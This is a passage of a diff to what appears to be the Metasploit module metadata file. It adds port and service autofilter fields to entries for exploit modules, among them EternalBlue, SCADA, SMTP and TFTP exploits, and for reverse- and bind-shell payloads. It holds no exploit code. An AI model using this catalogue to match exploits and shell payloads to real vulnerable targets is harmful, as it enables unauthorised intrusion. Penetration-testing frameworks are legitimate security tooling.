@@ "platform": "Windows", "arch": "", "rport": 11234, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -94542,6 +122171,12 @@ "platform": "Windows", "arch": "", "rport": 2001, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows" ], @@ -94577,6 +122212,12 @@ "platform": "Windows", "arch": "", "rport": 46823, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Winlog Lite 2.07.00" ], @@ -94613,6 +122254,12 @@ "platform": "Windows", "arch": "", "rport": 46824, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project", "Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project" @@ -94648,6 +122295,12 @@ "platform": "Windows", "arch": "", "rport": 20111, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3" ], @@ -94682,6 +122335,12 @@ "platform": "Windows", "arch": "", "rport": 34205, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" ], @@ -94717,6 +122376,12 @@ "platform": "Windows", "arch": "", "rport": 20010, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3" ], @@ -94751,6 +122416,12 @@ "platform": "Windows", "arch": "", "rport": 20171, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" ], @@ -94784,6 +122455,12 @@ "platform": "Windows", "arch": "", "rport": 5061, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "AIM Triton 1.0.4 Universal" ], @@ -94817,6 +122494,12 @@ "platform": "Windows", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "sipXezPhone 0.35a Universal" ], @@ -94850,6 +122533,12 @@ "platform": "Windows", "arch": "", "rport": 5060, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SIPfoundry sipXphone 2.6.0.27 Universal" ], @@ -94881,6 +122570,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -94915,6 +122610,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows x86", "Windows x64" @@ -94951,6 +122652,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows x32", "Windows x64" @@ -94986,6 +122695,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows XP SP0/SP1" ], @@ -95020,6 +122737,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP2-SP4 + Windows XP SP0-SP1" ], @@ -95054,6 +122779,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targetting", "Windows 2000 English", @@ -95090,6 +122823,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP4" ], @@ -95125,6 +122866,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP0-SP4", "Windows 2000 SP4 French", @@ -95169,6 +122918,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 SP4" ], @@ -95204,6 +122961,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "Windows 2000 SP4", @@ -95240,6 +123005,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "(wcscpy) Automatic (NT 4.0, 2000 SP0-SP4, XP SP0-SP1)", "(wcscpy) Windows NT 4.0 / Windows 2000 SP0-SP4", @@ -95279,6 +123052,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows XP SP2" ], @@ -95313,6 +123094,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows XP SP2" ], @@ -95347,6 +123136,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targetting", "Windows 2000 SP4", @@ -95384,6 +123181,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)", "Windows 2000 Server SP0-SP4+ English", @@ -95431,6 +123236,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targeting", "Windows 2000 Universal", @@ -95541,6 +123354,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows Vista SP1/SP2 and Server 2008 (x86)" ], @@ -95578,6 +123399,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -95612,6 +123439,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows Universal" ], @@ -95647,6 +123482,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -95689,6 +123530,12 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 7 and Server 2008 R2 (x64) All Service Packs" ], @@ -95734,10 +123581,16 @@ "platform": "Windows", "arch": "x64", "rport": 445, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "win x64" ], - "mod_time": "2018-08-27 16:06:07 +0000", + "mod_time": "2018-10-05 03:00:40 +0000", "path": "/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", "is_install_path": true, "ref_name": "windows/smb/ms17_010_eternalblue_win8", @@ -95777,6 +123630,14 @@ "platform": "Windows", "arch": "x86, x64", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "PowerShell", @@ -95821,6 +123682,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Windows 2000 / Windows XP / Windows 2003" ], @@ -95858,6 +123727,14 @@ "platform": "Windows", "arch": "x86, x64", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic", "PowerShell", @@ -95897,6 +123774,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic" ], @@ -95929,6 +123814,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "DLL", "PSH" @@ -95967,6 +123858,12 @@ "platform": "Windows", "arch": "x86, x64", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic" ], @@ -96001,6 +123898,14 @@ "platform": "Windows", "arch": "", "rport": 445, + "autofilter_ports": [ + 139, + 445 + ], + "autofilter_services": [ + "netbios-ssn", + "microsoft-ds" + ], "targets": [ "Automatic Targeting" ], @@ -96035,6 +123940,12 @@ "platform": "Windows", "arch": "x86", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0 - XP SP1 - EN/FR/GR", "Windows XP SP2 - EN" @@ -96069,6 +123980,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Mercury Mail Transport System 4.51" ], @@ -96105,6 +124022,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Exchange 2000" ], @@ -96139,6 +124062,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3", "Windows Server 2003 SP0", @@ -96174,6 +124103,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Universal" ], @@ -96207,6 +124142,12 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -96242,6 +124183,18 @@ "platform": "Windows", "arch": "", "rport": 25, + "autofilter_ports": [ + 25, + 465, + 587, + 2525, + 25025, + 25000 + ], + "autofilter_services": [ + "smtp", + "smtps" + ], "targets": [ "Automatic", "Windows 2000 SP0 Italian", @@ -96287,6 +124240,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP0-SP4 English", "Windows 2000 SP0-SP4 German", @@ -96327,6 +124286,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Freesshd <= 1.2.6 / Windows (Universal)" ], @@ -96360,6 +124325,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP4 English", "Windows XP Pro SP0 English", @@ -96396,6 +124367,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows XP SP2 English", @@ -96431,6 +124408,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SecureCRT.exe (3.4.4)" ], @@ -96465,6 +124448,12 @@ "platform": "Windows", "arch": "", "rport": 22, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Sysax 5.53 on Win XP SP3 / Win2k3 SP0", "Sysax 5.53 on Win2K3 SP1/SP2" @@ -96500,6 +124489,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4", "Windows 2000 SP3", @@ -96540,6 +124535,12 @@ "platform": "Windows", "arch": "x86", "rport": 23, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro SP0/4 English REMOTE", "Windows 2000 Pro SP0/4 English LOCAL (debug - 127.0.0.1)", @@ -96575,6 +124576,12 @@ "platform": "Windows", "arch": "", "rport": 2380, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 Pro English All", "Windows XP Pro SP0/SP1 English" @@ -96610,6 +124617,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows NT SP4 English", @@ -96656,6 +124669,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Distinct TFTP 3.10 on Windows" ], @@ -96690,6 +124709,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows 2000 SP3 English" @@ -96724,6 +124749,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows 2000 Pro English ALL", @@ -96762,6 +124793,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "NetDecision 4.2 TFTP on Windows XP SP3 / Windows 2003 SP2" ], @@ -96797,6 +124834,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "OpenTFTP 1.4 Service", "OpenTFTP 1.4 Stand Alone" @@ -96832,6 +124875,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows Server 2000", "Windows XP SP2" @@ -96866,6 +124915,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Automatic", "Windows NT 4.0 SP6a English", @@ -96904,6 +124959,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Universal - tftpd.exe" ], @@ -96939,6 +125000,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP2/SP3 EN Service Mode", "Windows XP SP2/SP3 EN Standalone Mode", @@ -96978,6 +125045,12 @@ "platform": "Windows", "arch": "", "rport": 69, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "3CTftpSvc 2.0.1" ], @@ -97011,6 +125084,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "W2API.DLL TNG 2.3", "Windows 2000 SP0-SP4 English", @@ -97048,6 +125127,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows XP SP2 English", @@ -97083,6 +125168,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 SP4 English", "Windows XP SP2 English", @@ -97118,6 +125209,12 @@ "platform": "Windows", "arch": "", "rport": null, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows XP SP3" ], @@ -97151,6 +125248,21 @@ "platform": "Windows", "arch": "", "rport": 5800, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], "targets": [ "Windows NT4 SP3-6", "Windows 2000 SP1-4", @@ -97187,6 +125299,12 @@ "platform": "Windows", "arch": "", "rport": 62514, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "SafeNet Irelke 10.8.0.20", "SafeNet Irelke 10.8.0.10", @@ -97220,6 +125338,24 @@ "platform": "Windows", "arch": "x86, x64", "rport": 5985, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443, + 5985, + 5986 + ], + "autofilter_services": [ + "http", + "https", + "winrm" + ], "targets": [ "Windows" ], @@ -97254,6 +125390,12 @@ "platform": "Windows", "arch": "", "rport": 42, + "autofilter_ports": [ + + ], + "autofilter_services": [ + + ], "targets": [ "Windows 2000 English" ], @@ -97285,6 +125427,8 @@ "platform": "All", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-09-14 18:26:11 +0000", "path": "/modules/nops/aarch64/simple.rb", @@ -97314,6 +125458,8 @@ "platform": "All", "arch": "armle", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/armle/simple.rb", @@ -97343,6 +125489,8 @@ "platform": "All", "arch": "mipsbe", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/mipsbe/better.rb", @@ -97372,6 +125520,8 @@ "platform": "All", "arch": "php", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/php/generic.rb", @@ -97401,6 +125551,8 @@ "platform": "All", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-20 15:53:49 +0000", "path": "/modules/nops/ppc/simple.rb", @@ -97430,6 +125582,8 @@ "platform": "All", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-08-27 11:24:38 +0000", "path": "/modules/nops/sparc/random.rb", @@ -97459,6 +125613,8 @@ "platform": "All", "arch": "tty", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/tty/generic.rb", @@ -97488,6 +125644,8 @@ "platform": "All", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/x64/simple.rb", @@ -97518,6 +125676,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/x86/opty2.rb", @@ -97547,6 +125707,8 @@ "platform": "All", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/nops/x86/single_byte.rb", @@ -97576,6 +125738,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_bind_tcp.rb", @@ -97605,6 +125769,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_find_port.rb", @@ -97634,6 +125800,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_interact.rb", @@ -97663,6 +125831,8 @@ "platform": "AIX", "arch": "ppc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/aix/ppc/shell_reverse_tcp.rb", @@ -97695,6 +125865,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_http.rb", @@ -97727,6 +125899,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_https.rb", @@ -97758,6 +125932,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_tcp.rb", @@ -97787,6 +125963,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb", @@ -97816,6 +125994,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb", @@ -97845,6 +126025,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb", @@ -97877,6 +126059,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_http.rb", @@ -97909,6 +126093,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_https.rb", @@ -97939,6 +126125,8 @@ "platform": "Android", "arch": "dalvik", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/android/reverse_tcp.rb", @@ -97970,6 +126158,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb", @@ -98001,6 +126191,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb", @@ -98032,6 +126224,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-09-20 17:26:15 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb", @@ -98061,6 +126255,8 @@ "platform": "Apple_iOS", "arch": "aarch64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-12-19 15:39:29 +0000", "path": "/modules/payloads/singles/apple_ios/aarch64/shell_reverse_tcp.rb", @@ -98090,6 +126286,8 @@ "platform": "BSD", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/sparc/shell_bind_tcp.rb", @@ -98119,6 +126317,8 @@ "platform": "BSD", "arch": "sparc", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/sparc/shell_reverse_tcp.rb", @@ -98148,6 +126348,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x64/exec.rb", @@ -98177,6 +126379,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb", @@ -98207,6 +126411,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp.rb", @@ -98236,6 +126442,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb", @@ -98265,6 +126473,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb", @@ -98295,6 +126505,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb", @@ -98324,6 +126536,8 @@ "platform": "BSD", "arch": "x64", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb", @@ -98355,6 +126569,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/exec.rb", @@ -98384,6 +126600,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb", @@ -98413,6 +126631,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb", @@ -98444,6 +126664,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/bind_ipv6_tcp.rb", @@ -98473,6 +126695,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/bind_tcp.rb", @@ -98502,6 +126726,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/find_tag.rb", @@ -98533,6 +126759,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/reverse_ipv6_tcp.rb", @@ -98562,6 +126790,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsd/x86/reverse_tcp.rb", @@ -98591,6 +126821,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp.rb", @@ -98622,6 +126854,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_bind_tcp_ipv6.rb", @@ -98651,6 +126885,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_find_port.rb", @@ -98680,6 +126916,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_find_tag.rb", @@ -98709,6 +126947,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2018-05-01 04:57:42 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp.rb", @@ -98740,6 +126980,8 @@ "platform": "BSD", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/singles/bsd/x86/shell_reverse_tcp_ipv6.rb", @@ -98769,6 +127011,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, "mod_time": "2017-07-24 06:26:21 +0000", "path": "/modules/payloads/stagers/bsdi/x86/bind_tcp.rb", @@ -98798,6 +127042,8 @@ "platform": "BSDi", "arch": "x86", "rport": null, + "autofilter_ports": null, + "autofilter_services": null, "targets": null, 